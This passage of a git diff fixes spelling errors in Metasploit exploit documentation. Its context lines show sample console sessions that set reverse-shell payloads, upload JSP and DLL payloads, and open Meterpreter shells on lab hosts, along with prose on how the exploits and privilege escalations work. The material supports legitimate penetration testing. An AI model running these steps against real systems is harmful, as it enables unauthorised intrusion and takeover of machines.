+61,7 @@ PAYLOAD => php/reverse_php msf exploit(unix/http/pfsense_graph_injection_exec) > exploit [*] Started reverse TCP handler on 1.1.1.1:4444 -[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload +[*] Detected pfSense 2.1.3-RELEASE, uploading initial payload [*] Payload uploaded successfully, executing [*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:3454) at 2018-01-01 15:49:38 -0600 uname -a diff --git a/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.md b/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.md index d7191f61d993..f7e78eb9ee34 100644 --- a/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.md 
+++ b/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.md @@ -7,7 +7,7 @@ ## Vulnerable Application - Unfortunately a virtual copy of this camera is not avaiable. + Unfortunately a virtual copy of this camera is not available. ## Verification Steps diff --git a/documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md b/documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md index 94d04ca2f0c4..a60e36ece20f 100644 --- a/documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md +++ b/documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md @@ -1,4 +1,4 @@ -Within Polycom HDX series devices, there is a command execution vulneralbility in one of the dev commands `devcmds`, `lan traceroute` which subtituing `$()` or otherwise similiar operand , similiar to [polycom_hdx_auth_bypass](https://github.com/rapid7/metasploit-framework/blob/f250e15b6ee2d7b3e38ee1229bee533a021d1415/modules/exploits/unix/polycom_hdx_auth_bypass.rb) could allow for an attacker to obtain a command shell. Spaces must be replaced with `#{IFS}` aka `Internal Field Seperator` +Within Polycom HDX series devices, there is a command execution vulneralbility in one of the dev commands `devcmds`, `lan traceroute` which subtituing `$()` or otherwise similar operand , similar to [polycom_hdx_auth_bypass](https://github.com/rapid7/metasploit-framework/blob/f250e15b6ee2d7b3e38ee1229bee533a021d1415/modules/exploits/unix/polycom_hdx_auth_bypass.rb) could allow for an attacker to obtain a command shell. Spaces must be replaced with `#{IFS}` aka `Internal Field Seperator` ## Vulnerable Application 
@@ -11,7 +11,7 @@ the devices. ## Payloads -Supported payloads include the telnet payload `cmd/unix/reverse` but not `cmd/unix/reverse_ssl_double_telnet` Alternatively, `cmd/unix/reverse_openssl` can be used or, your own choice of executing any arbitary command with `cmd/unix/generic` +Supported payloads include the telnet payload `cmd/unix/reverse` but not `cmd/unix/reverse_ssl_double_telnet` Alternatively, `cmd/unix/reverse_openssl` can be used or, your own choice of executing any arbitrary command with `cmd/unix/generic` ``` Compatible Payloads diff --git a/documentation/modules/exploit/unix/webapp/bolt_authenticated_rce.md b/documentation/modules/exploit/unix/webapp/bolt_authenticated_rce.md index 50f50552809c..61c20318dd82 100644 --- a/documentation/modules/exploit/unix/webapp/bolt_authenticated_rce.md +++ b/documentation/modules/exploit/unix/webapp/bolt_authenticated_rce.md @@ -8,7 +8,7 @@ If this succeeds, the target may be vulnerable. The module then proceeds by issuing an HTTP GET request for /bolt/overview/showcases in order to obtain a CSRF token to be used later. Next, the module obtains a list of filename tokens from `/async/browse/cache/.sessions.` -These tokens are used to create files with the blacklisted `.php` extention via HTTP POST requests to `/async/folder/rename`. +These tokens are used to create files with the blacklisted `.php` extension via HTTP POST requests to `/async/folder/rename`. With the CSRF token obtained before, it is possible to create .php files by "renaming" these cache tokens. While most (if not all) available tokens can be used to created .php files in the /root directory on the server, the resulting files cannot always be used to execute commands. diff --git a/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md b/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md index 6dd4dcd0407a..be4b43864e10 100644 
--- a/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md +++ b/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md @@ -13,7 +13,7 @@ https://github.com/opennetadmin/ona/wiki/Install ## Verification -Launch metasploit and set the appropiate options: +Launch metasploit and set the appropriate options: > > * [ ] Start `msfconsole` > * [ ] `use exploit/unix/webapp/opennetadmin_ping_cmd_injection` diff --git a/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md b/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md index b57b4051fe6b..158be74834f8 100644 --- a/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md +++ b/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md @@ -30,7 +30,7 @@ * https://sourceforge.net/projects/xymon/files/Xymon/4.3.10/VM/ - To enable authentication via the web interace, add a user to `/etc/xymon/xymonpasswd` : + To enable authentication via the web interface, add a user to `/etc/xymon/xymonpasswd` : ``` htpasswd /etc/xymon/xymonpasswd diff --git a/documentation/modules/exploit/unix/webapp/zoneminder_lang_exec.md b/documentation/modules/exploit/unix/webapp/zoneminder_lang_exec.md index 5b22eb5db308..e9012c9b1ec5 100644 --- a/documentation/modules/exploit/unix/webapp/zoneminder_lang_exec.md +++ b/documentation/modules/exploit/unix/webapp/zoneminder_lang_exec.md @@ -110,7 +110,7 @@ id uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` -### Failed exploitation due to invaild credentials +### Failed exploitation due to invalid credentials ``` msf6 > use exploit/unix/webapp/zoneminder_lang_exec diff --git a/documentation/modules/exploit/windows/backupexec/ssl_uaf.md b/documentation/modules/exploit/windows/backupexec/ssl_uaf.md index 37b72d996405..969c4344f047 100644 --- a/documentation/modules/exploit/windows/backupexec/ssl_uaf.md +++ b/documentation/modules/exploit/windows/backupexec/ssl_uaf.md 
@@ -198,4 +198,4 @@ While the exploit is not guaranteed to gain RCE (see the module's description), in practise the agent is often widely installed in a Windows domain across a range of hosts (including fileservers and domain controllers). This means usually at least one instance of the agent will give a shell on a server where -it's easy enough to further escalate to Domain Administator from `SYSTEM`. +it's easy enough to further escalate to Domain Administrator from `SYSTEM`. diff --git a/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md b/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md index 37cef2178919..23c817909fbc 100644 --- a/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md +++ b/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md @@ -60,7 +60,7 @@ Meterpreter : x86/windows ### Windows 7 Pro SP1 x64 with IE 8.0.7601.17514 -The attacker's IP is `192.168.2.3` and the victim's IP is `192.168.2.208`. Unlike on the Windows XP, target victim will see a popup dialog apear and they will have to allow the execution of the PowerShell script for the exploit to work. You need to set `AllowPowershellPrompt` option to `true` otherwise the exploit won't work on Windows 7. +The attacker's IP is `192.168.2.3` and the victim's IP is `192.168.2.208`. Unlike on the Windows XP, target victim will see a popup dialog appear and they will have to allow the execution of the PowerShell script for the exploit to work. You need to set `AllowPowershellPrompt` option to `true` otherwise the exploit won't work on Windows 7. ``` msf > use exploit/windows/browser/ms14_064_ole_code_execution diff --git a/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md b/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md index 37f833451181..b05b8e858167 100644 --- a/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md 
+++ b/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md @@ -1,6 +1,6 @@ ## Description -Foxit Reader v9.0.1.1049 and earlier are affected by use-after-free and uninitialzed memory vulnerabilities that can be used to gain code execution. This module uses Uint32Array uninitialized memory and text annotation use-after-free vulnerabilities to call WinExec with a share file path to download and execute the specified exe. The module has been tested against Foxit Reader v9.0.1.1049 running on Windows 7 x64 and Windows 10 Pro x64 Build 17134. Windows 10 Enterprise needs to have [insecure logons enabled](https://support.microsoft.com/en-ca/help/4046019) for the exploit to work as expected. +Foxit Reader v9.0.1.1049 and earlier are affected by use-after-free and uninitialized memory vulnerabilities that can be used to gain code execution. This module uses Uint32Array uninitialized memory and text annotation use-after-free vulnerabilities to call WinExec with a share file path to download and execute the specified exe. The module has been tested against Foxit Reader v9.0.1.1049 running on Windows 7 x64 and Windows 10 Pro x64 Build 17134. Windows 10 Enterprise needs to have [insecure logons enabled](https://support.microsoft.com/en-ca/help/4046019) for the exploit to work as expected. ## Vulnerable Application diff --git a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md index bb69f053a0b1..4b72a903ff4a 100644 --- a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md +++ b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md 
@@ -40,7 +40,7 @@ msf exploit(office_ms17_11882) > run
 [*] Local IP: http://192.1668.0.11:8080/BUY0DYgc
 [*] Server started.
 [*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24
-[*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending
+[*] 192.168.0.24 office_ms17_11882 - Stage two requested, sending
 [*] Sending stage (205379 bytes) to 192.168.0.24
 [*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217) at 2017-11-21 14:41:59 -0500
 sessions -i 1
diff --git a/documentation/modules/exploit/windows/fileformat/vlc_mkv.md b/documentation/modules/exploit/windows/fileformat/vlc_mkv.md
index 25e306b25e26..97a58d1d7f97 100644
--- a/documentation/modules/exploit/windows/fileformat/vlc_mkv.md
+++ b/documentation/modules/exploit/windows/fileformat/vlc_mkv.md
@@ -32,7 +32,7 @@ msf5 exploit(windows/fileformat/vlc_mkv) > run
 [+] tjub-part2.mkv stored at /home/msfdev/.msf4/local/tjub-part2.mkv
 [*] Created tjub-part2.mkv. Put this file in the same directory as tjub-part1.mkv
 [*] Appending blocks to tjub-part1.mkv
-[+] Succesfully appended blocks to tjub-part1.mkv
+[+] Successfully appended blocks to tjub-part1.mkv
 msf5 exploit(windows/fileformat/vlc_mkv) > handler -p windows/x64/shell/reverse_tcp -H 172.22.222.134 -P 4444
 [*] Payload handler running as background job 0.
 msf5 exploit(windows/fileformat/vlc_mkv) >
diff --git a/documentation/modules/exploit/windows/fileformat/word_mshtml_rce.md b/documentation/modules/exploit/windows/fileformat/word_mshtml_rce.md
index 5ccd0d54efb2..91fd70cffa68 100644
--- a/documentation/modules/exploit/windows/fileformat/word_mshtml_rce.md
+++ b/documentation/modules/exploit/windows/fileformat/word_mshtml_rce.md
@@ -111,13 +111,13 @@ A DOCX file that will be used as a template to build the exploit. You need to create new office document and personalizing it by your own model (CV, Report, ...). - The easy way, copy and paste (keep formating) from `data/exploits/cve-2021-40444.docx`. + The easy way, copy and paste (keep formatting) from `data/exploits/cve-2021-40444.docx`. You can copy this anywhere in the document. Save the document and unpack this. - Check that `word/documment.xml` contains something like: + Check that `word/document.xml` contains something like: ``` <w:object w:dxaOrig="4320" w:dyaOrig="4320"> diff --git a/documentation/modules/exploit/windows/ftp/ftpshell_cli_bof.md b/documentation/modules/exploit/windows/ftp/ftpshell_cli_bof.md index c58b8b6feddd..f6b7fdbc4786 100644 --- a/documentation/modules/exploit/windows/ftp/ftpshell_cli_bof.md +++ b/documentation/modules/exploit/windows/ftp/ftpshell_cli_bof.md @@ -9,7 +9,7 @@ FTPShell client 6.70 (Enterprise edition) is affected by a stack-based buffer ov 4. Do `set PAYLOAD windows/meterpreter/reverse_tcp` 5. Do `set LHOST ip` 6. Do `exploit` - 7. Conect to the FTP server using FTPShell client 6.70 + 7. Connect to the FTP server using FTPShell client 6.70 8. Verify the Meterpreter session is opened ## Scenarios diff --git a/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md b/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md index cd29136b9237..6d2f2a000cbd 100644 --- a/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md +++ b/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md 
@@ -4,7 +4,7 @@ A directory traversal vulnerability was discovered in the fileserver upload/down Because vulnerable servers allow for directory traversal, they will accept HTTP PUT requests for `/fileserver/..\\admin\\` and process these as requests for `/admin/`. For the PUT request to succeed, credentials need to be provided. -This module exploits CVE-2015-1830 by attempting to upload a JSP payload to a target via an HTTP PUT requests for `/fileserver/..\\admin\\` using the default credentials `admin:admin` (or any other credentials provided by the user). It then issues an HTTP GET request to `/admin/.jsp` on the target in order to trigger the payload and obtain a shell. The module has been succesfully tested against ActiveMQ 5.11.1 on a Windows 7 machine. +This module exploits CVE-2015-1830 by attempting to upload a JSP payload to a target via an HTTP PUT requests for `/fileserver/..\\admin\\` using the default credentials `admin:admin` (or any other credentials provided by the user). It then issues an HTTP GET request to `/admin/.jsp` on the target in order to trigger the payload and obtain a shell. The module has been successfully tested against ActiveMQ 5.11.1 on a Windows 7 machine. ## Verification Steps diff --git a/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md b/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md index 9a629e93cbc2..92834909a9b2 100644 --- a/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md +++ b/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md 
@@ -42,7 +42,7 @@ The expected structure includes a "type" attribute to instruct the server which Log in as the super user account and make sure the 404 error page is set to the built-in 404 Error Page. Typically, this is already set as the default setting, but during testing I encountered an edge case where an issue during installation caused this value to be set to "None Specified". - Additionally, if you are testing this module from a machine other than the host that the application is installed on, you will need to configure the Site Alias so that it is accessible using a hostname other than `localhost`. Additional firewall rules may need to be configured to allow web access, depending on how you set up the applicaiton in IIS. + Additionally, if you are testing this module from a machine other than the host that the application is installed on, you will need to configure the Site Alias so that it is accessible using a hostname other than `localhost`. Additional firewall rules may need to be configured to allow web access, depending on how you set up the application in IIS. This module has been tested on DNN v7.0.0 - v9.3.0-RC running on Windows Server 2016. 
@@ -116,7 +116,7 @@ The expected structure includes a "type" attribute to instruct the server which 22. **Verify** that you get a Meterpreter shell ### v9.2.2 - 9.3.0-RC - In these versions, the `userId` value was changed to be a randomly generated GUID. This means that only the first part of the verification plaintext is known. By providing a list of several verification codes, it is possible to reduce the nubmer of potential encryption key values to a feasible amount. Once the list of encryption keys has been reduced, the module will test each key until an HTTP callback is received on port `8080` that indicates which key worked. Then, the final exploit payload will be encrypted using the recovered key and sent to the server, resulting in a shell. + In these versions, the `userId` value was changed to be a randomly generated GUID. This means that only the first part of the verification plaintext is known. By providing a list of several verification codes, it is possible to reduce the number of potential encryption key values to a feasible amount. Once the list of encryption keys has been reduced, the module will test each key until an HTTP callback is received on port `8080` that indicates which key worked. Then, the final exploit payload will be encrypted using the recovered key and sent to the server, resulting in a shell. 1. Install the application 2. Configure the application to use Verified Registration 
@@ -284,7 +284,7 @@ The expected structure includes a "type" attribute to instruct the server which [*] Trying to determine DNN Version... [*] Checking version at /Documentation/License.txt ... - [!] DNN Version Found: v9.2.0+ - Requires ENCRYPTED and SESSION_TOKEN. Setting target to 3 (v9.2.0 - v9.2.1). Site may also be 9.2.2 - try setting target 4 and supply a file of of verification codes, or specifiy valid Key and IV values. + [!] DNN Version Found: v9.2.0+ - Requires ENCRYPTED and SESSION_TOKEN. Setting target to 3 (v9.2.0 - v9.2.1). Site may also be 9.2.2 - try setting target 4 and supply a file of verification codes, or specify valid Key and IV values. [*] Checking for custom error page at: /__ ... [+] Custom error page detected. [+] 192.168.31.131:8085 - The target appears to be vulnerable. diff --git a/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md b/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md index 4ed817e7f438..b4f49686a9ed 100644 --- a/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md +++ b/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md @@ -23,7 +23,7 @@ At a high level, the steps the exploit takes are as follows: 1. Build a Common Access Token corresponding to a user with the "Mailbox Import Export" role 1. If an email address is specified using the `EMAIL` datastore option, the exploit will attempt to use the owner 1. If no email address is specified - 1. The exploit will leverage the SSRF to issue a reques to EWS and enumerate the email addresses + 1. The exploit will leverage the SSRF to issue a request to EWS and enumerate the email addresses * This technique was taken from [dmassland/proxyshell-poc](https://github.com/dmaasland/proxyshell-poc/blob/main/proxyshell-enumerate.py) 1. The module will store the enumerated email addresses in a CSV file 1. Each of the email addresses will be checked for the necessary role 
diff --git a/documentation/modules/exploit/windows/http/lg_simple_editor_rce.md b/documentation/modules/exploit/windows/http/lg_simple_editor_rce.md index 682d009d1101..c56cbc78482c 100644 --- a/documentation/modules/exploit/windows/http/lg_simple_editor_rce.md +++ b/documentation/modules/exploit/windows/http/lg_simple_editor_rce.md @@ -43,7 +43,7 @@ msf6 exploit(windows/http/lg_simple_editor_rce) > run [+] The target appears to be vulnerable. Version: 3.21.0 [*] Uploading JSP payload... [+] Payload uploaded successfully -[+] /nvFIE_original.bmp -> /nvFIE.jsp copy successfull. +[+] /nvFIE_original.bmp -> /nvFIE.jsp copy successful. [*] Triggering payload... [*] Sending stage (175686 bytes) to 192.168.56.109 [+] Deleted ./webapps/simpleeditor/nvFIE.jsp diff --git a/documentation/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810.md b/documentation/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810.md index a4922eae0d7c..d43fd51feb10 100644 --- a/documentation/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810.md +++ b/documentation/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810.md @@ -29,7 +29,7 @@ you'll need that. 1. Prepare a Windows environment to install on. 1. Download [ManageEngine_ADSelfService_Plus_64bit.exe] build 6121 -1. Run the installer (skip registeration). Do **not** "Start ADSelfService Plus in console mode". +1. Run the installer (skip registration). Do **not** "Start ADSelfService Plus in console mode". 1. Run the service installer (start menu -> "Install ADSelfService Plus as Service") 1. Start the service (services -> "ManageEngine ADSelfService Plus") 1. Nagivate to the web server: http://localhost:8888 (may take a few minutes to load) diff --git a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md index 45e755ca70bd..c8af3b319be4 100644 
--- a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md +++ b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md @@ -39,7 +39,7 @@ msf5 exploit(windows/http/manageengine_appmanager_exec) > check msf5 exploit(windows/http/manageengine_appmanager_exec) > run [*] Started reverse TCP handler on 12.0.0.1:4444 -[*] Trigerring the vulnerability +[*] Triggering the vulnerability [*] Sending stage (179779 bytes) to 12.0.0.192 meterpreter > getuid diff --git a/documentation/modules/exploit/windows/http/oats_weblogic_console.md b/documentation/modules/exploit/windows/http/oats_weblogic_console.md index 44fa6efa4766..38cdce0a6b0d 100644 --- a/documentation/modules/exploit/windows/http/oats_weblogic_console.md +++ b/documentation/modules/exploit/windows/http/oats_weblogic_console.md @@ -4,7 +4,7 @@ Oracle Application Testing Suite (OATS) is a comprehensive, integrated testing s applications, and Oracle databases. OATS is part of an application deployed in the WebLogic service on port 8088, which also includes these tools: Administrator, OpenScript, Oracle Load Testing, and Oracle Test Manager. -In the administrator console, the deployement feature can be abused to upload an arbitrary WAR file, allowing remote code execution under the +In the administrator console, the deployment feature can be abused to upload an arbitrary WAR file, allowing remote code execution under the context of SYSTEM. Authentication is required. The following is the exact setup I used to test and analyze the vulnerability: diff --git a/documentation/modules/exploit/windows/http/sitecore_xp_cve_2021_42237.md b/documentation/modules/exploit/windows/http/sitecore_xp_cve_2021_42237.md index d4fd6eb81f8f..34224c40aa69 100644 --- a/documentation/modules/exploit/windows/http/sitecore_xp_cve_2021_42237.md +++ b/documentation/modules/exploit/windows/http/sitecore_xp_cve_2021_42237.md 
@@ -4,7 +4,7 @@ of Sitecore XP 7.5 to 7.5.2, 8.0 to 8.0.7, 8.1 to 8.1.3, and 8.2 to 8.2.7. Versions 7.2.6 and earlier and 9.0 and later are not affected. The vulnerability occurs due to `Report.ashx`'s handler, located in `Sitecore.Xdb.Client.dll` -under the `Sitecore.sitecore.shell.ClientBin.Reporting.Report` defintion, having a `ProcessRequest()` +under the `Sitecore.sitecore.shell.ClientBin.Reporting.Report` definition, having a `ProcessRequest()` handler that calls `ProcessReport()` with the context of the attacker's request without properly checking if the attacker is authenticated or not. diff --git a/documentation/modules/exploit/windows/http/trendmicro_officescan_widget_exec.md b/documentation/modules/exploit/windows/http/trendmicro_officescan_widget_exec.md index 2cf1fc638abf..21524b1c43e9 100644 --- a/documentation/modules/exploit/windows/http/trendmicro_officescan_widget_exec.md +++ b/documentation/modules/exploit/windows/http/trendmicro_officescan_widget_exec.md @@ -43,7 +43,7 @@ msf exploit(trendmicro_officescan_widget_exec) > exploit [*] Exploiting authentication bypass [+] Authenticated successfully bypassed. [*] Generating payload -[*] Trigerring command injection vulnerability +[*] Triggering command injection vulnerability [*] Sending stage (179267 bytes) to 12.0.0.176 [*] Meterpreter session 9 opened (12.0.0.1:4444 -> 12.0.0.176:49842) at 2017-10-09 21:57:29 +0300 diff --git a/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md b/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md index 87110018100b..751dba8bab10 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md +++ b/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md 
@@ -172,7 +172,7 @@ msf5 exploit(windows/local/cve_2020_0668_service_tracing) > run [*] Making C:\Users\msfuser\AppData\Local\Temp\jeYpOx on DESKTOP-D1E425Q [*] Creating C:\Users\msfuser\AppData\Local\Temp\jeYpOx [*] Creating mountpoint -[+] Successfuly opened C:\Users\msfuser\AppData\Local\Temp\jeYpOx +[+] Successfully opened C:\Users\msfuser\AppData\Local\Temp\jeYpOx [*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\FICNArio.dll [*] Payload md5 = b8341507939ea464f81f0245628e470f [*] Creating Symlinks diff --git a/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md b/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md index 397b0dd9853b..5f3c0a8b3812 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md +++ b/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md @@ -16,7 +16,7 @@ location when it restarts, then it will load the DLL into itself when it restarts a second time. The DLL will then be running as ```SYSTEM```. When the printer is created, the target will show a pop-up saying a -printer weas created. +printer was created. A larger issue here is that the Spooler service does not like to stop. Trying `sc stop` Spooler does not stop the spooler. Killing the pid with a trusted process will kill it, but it restarts diff --git a/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md b/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md index 72db8a91449e..fb5d82958ce0 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md +++ b/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md @@ -60,7 +60,7 @@ Verify you get a session ```C:\windows\system32\``` **JUNCTION_PATH** - Path to use as a juntion point. It should be nonexistant/empty. Default is + Path to use as a juntion point. It should be nonexistent/empty. Default is ```%TEMP%/%RAND%``` **PRINTER_NAME** 
diff --git a/documentation/modules/exploit/windows/local/cve_2022_26904_superprofile.md b/documentation/modules/exploit/windows/local/cve_2022_26904_superprofile.md index 02c97c123374..683b63d10615 100644 --- a/documentation/modules/exploit/windows/local/cve_2022_26904_superprofile.md +++ b/documentation/modules/exploit/windows/local/cve_2022_26904_superprofile.md @@ -54,7 +54,7 @@ This module has been successfully tested on Windows 11. ### LOGINUSER The username of a valid user who has logged into the target system before and has a profile under `C:\Users` with their username in -`C:\Users\.\` format if targetting a domain user or `C:\Users\\` if targetting a local user account. This user +`C:\Users\.\` format if targeting a domain user or `C:\Users\\` if targeting a local user account. This user must not be an administrator or any account that would run with High integrity to ensure the UAC prompt appears as expected, and should ideally be another normal user account that has permissions to log into the target computer. diff --git a/documentation/modules/exploit/windows/local/lexmark_driver_privesc.md b/documentation/modules/exploit/windows/local/lexmark_driver_privesc.md index 3b713dfb1c88..e38b57701cd1 100644 --- a/documentation/modules/exploit/windows/local/lexmark_driver_privesc.md +++ b/documentation/modules/exploit/windows/local/lexmark_driver_privesc.md @@ -1,7 +1,7 @@ ## Vulnerable Application Various Lexmark Universal Printer drivers as listed at [advisory TE953](http://support.lexmark.com/index?page=content&id=TE953) -allow low-privileged authenicated users to elevate their privileges to `SYSTEM` on affected Windows systems by modifying +allow low-privileged authenticated users to elevate their privileges to `SYSTEM` on affected Windows systems by modifying the XML file at `C:\\ProgramData\\\\Universal Color Laser.gdl` to replace the DLL path to `unires.dll` with a malicious DLL path. 
diff --git a/documentation/modules/exploit/windows/local/ms16_075_reflection.md b/documentation/modules/exploit/windows/local/ms16_075_reflection.md index 2519c8eac8e6..87da5702f29b 100644 --- a/documentation/modules/exploit/windows/local/ms16_075_reflection.md +++ b/documentation/modules/exploit/windows/local/ms16_075_reflection.md @@ -8,7 +8,7 @@ attack at which intercepts the hash and relay responses from RPC to be able to establish a handle to a new SYSTEM token. Some caveats : Set your target option to match the architecture of your Meterpreter session, else it will inject the wrong architecture DLL into the process -of a seperate architecture. Additionally, after you have established a +of a separate architecture. Additionally, after you have established a session, you must use incognito to imperonsate the SYSTEM Token. ## Build Instructions diff --git a/documentation/modules/exploit/windows/local/ms16_reflection.md b/documentation/modules/exploit/windows/local/ms16_reflection.md index f813dab816e6..3484133973a5 100644 --- a/documentation/modules/exploit/windows/local/ms16_reflection.md +++ b/documentation/modules/exploit/windows/local/ms16_reflection.md @@ -8,7 +8,7 @@ attack at which intercepts the hash and relay responses from RPC to be able to establish a handle to a new SYSTEM token. Some caveats : Set your target option to match the architecture of your Meterpreter session, else it will inject the wrong architecture DLL into the process -of a seperate architecture. Additionally, after you have established a +of a separate architecture. Additionally, after you have established a session, you must use incognito to imperonsate the SYSTEM Token. ## Usage diff --git a/documentation/modules/exploit/windows/local/tokenmagic.md b/documentation/modules/exploit/windows/local/tokenmagic.md index 4d617b30f8bd..9ea7554935ce 100644 --- a/documentation/modules/exploit/windows/local/tokenmagic.md +++ b/documentation/modules/exploit/windows/local/tokenmagic.md 
@@ -7,7 +7,7 @@ integrity level, use it to create a new restricted token, impersonate it and use the Secondary Logon service to spawn a new process with High IL. Like playing hide-and-go-seek with tokens -The module exploits the high IL gained from the "token magic" by either starting a malicious service or by preforming a DLL hijack +The module exploits the high IL gained from the "token magic" by either starting a malicious service or by performing a DLL hijack on a known DLL in `system32`. ### Installation And Setup diff --git a/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md b/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md index ad7748dd4ceb..32e6461efac1 100644 --- a/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md +++ b/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md @@ -61,7 +61,7 @@ [*] Started reverse TCP handler on 172.16.191.165:4444 [*] Writing payload (283 bytes) to C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe ... [*] Sending C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe to \\.\pipe\WindscribeService ... - [+] Opended \\.\pipe\WindscribeService! Proceeding ... + [+] Opened \\.\pipe\WindscribeService! Proceeding ... [*] Sending stage (180291 bytes) to 172.16.191.242 [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.242:49365) at 2020-01-31 19:14:31 -0500 [-] Failed to delete C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe: stdapi_fs_delete_file: Operation failed: Access is denied. diff --git a/documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md b/documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md index f71f8ee504c1..3ad96a55b192 100644 --- a/documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md +++ b/documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md 
@@ -41,9 +41,9 @@ msf exploit(windows/misc/ahsay_fileupload) > run [+] Username and password are valid! [+] No need to create account, already exists! [*] Uploading payload -[+] Succesfully uploaded ../../webapps/cbs/help/en/lcofxnrzON.exe +[+] Successfully uploaded ../../webapps/cbs/help/en/lcofxnrzON.exe [*] Uploading payload -[+] Succesfully uploaded ../../webapps/cbs/help/en/myjnJMFlNi.jsp +[+] Successfully uploaded ../../webapps/cbs/help/en/myjnJMFlNi.jsp [*] Triggering exploit! https://172.16.238.175:443/cbs/help/en/myjnJMFlNi.jsp [+] Exploit executed! [*] Sending stage (179779 bytes) to 172.16.238.175 diff --git a/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md b/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md index fcd6c9c1773f..b2531707591b 100644 --- a/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md +++ b/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md 
@@ -48,15 +48,15 @@ msf5 exploit(windows/misc/ais_esel_server_rce) > run [*] Started reverse TCP handler on 10.66.75.208:4444 - [+] 10.66.75.212:5099 - Correct response received => Data send succesfully - [+] 10.66.75.212:5099 - Correct response received => Data send succesfully + [+] 10.66.75.212:5099 - Correct response received => Data send successfully + [+] 10.66.75.212:5099 - Correct response received => Data send successfully [*] 10.66.75.212:5099 - Command Stager progress - 1.47% done (1499/102292 bytes) - [+] 10.66.75.212:5099 - Correct response received => Data send succesfully + [+] 10.66.75.212:5099 - Correct response received => Data send successfully [*] 10.66.75.212:5099 - Command Stager progress - 2.93% done (2998/102292 bytes) - [+] 10.66.75.212:5099 - Correct response received => Data send succesfully + [+] 10.66.75.212:5099 - Correct response received => Data send successfully ... [*] 10.66.75.212:5099 - Command Stager progress - 99.55% done (101827/102292 bytes) - [+] 10.66.75.212:5099 - Correct response received => Data send succesfully + [+] 10.66.75.212:5099 - 